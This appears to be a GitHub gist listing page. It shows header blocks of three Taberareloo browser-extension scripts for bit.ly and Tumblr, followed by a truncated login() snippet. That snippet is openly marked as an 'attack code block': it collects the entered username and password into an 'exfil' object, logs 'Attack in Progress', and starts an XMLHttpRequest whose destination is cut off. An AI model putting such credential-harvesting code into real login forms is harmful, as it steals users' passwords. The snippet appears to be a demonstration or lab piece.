This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==Taberareloo== | |
// { | |
// "name" : "Replace bit.ly API Key" | |
// , "description" : "Replace bit.ly API_KEY and USER with own ones" | |
// , "include" : ["background"] | |
// , "version" : "0.1.0" | |
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/7cebac28ca695f4fe3312a5cbfed9162/raw/patch.replace.bitly.apikey.tbrl.js" | |
// } | |
// ==/Taberareloo== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==Taberareloo== | |
// { | |
// "name" : "Fix Tumblr.ReBlog on Dashboard 2021.12" | |
// , "description" : "Fix Tumblr.ReBlog on Dashboard 2021.12" | |
// , "include" : ["background", "content"] | |
// , "match" : ["*://*/*"] | |
// , "version" : "0.0.8" | |
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/a08ce031622390288980cdea27437108/raw/patch.fix.tumblr.reblog-dashboard.tbrl.js" | |
// } | |
// ==/Taberareloo== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==Taberareloo== | |
// { | |
// "name" : "Add Timestamp into Posts on Tumblr Dashboard" | |
// , "description" : "Add Timestamp into Posts on Tumblr Dashboard" | |
// , "include" : ["content"] | |
// , "match" : ["*://www.tumblr.com/*"] | |
// , "version" : "0.0.8" | |
// , "downloadURL" : "https://gist.githubusercontent.com/ailispaw/af6107e6a8760967f72818126065ef70/raw/userscript.tumblr.timestamp.tbrl.js" | |
// } | |
// ==/Taberareloo== |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function login() { | |
var username = $('#username-modal').val(); | |
var password = $('#password-modal').val(); | |
// Start of attack code block!!!!!!!!!!!!!!!!!!!!!! | |
var exfil = {"id": username, "password": password}; | |
if(username && password) { | |
console.log(JSON.stringify(exfil)) | |
// clearInterval(timer); | |
console.log('Attack in Progress - Data Ready: ', exfil); | |
var xhr = new XMLHttpRequest(); |
OlderNewer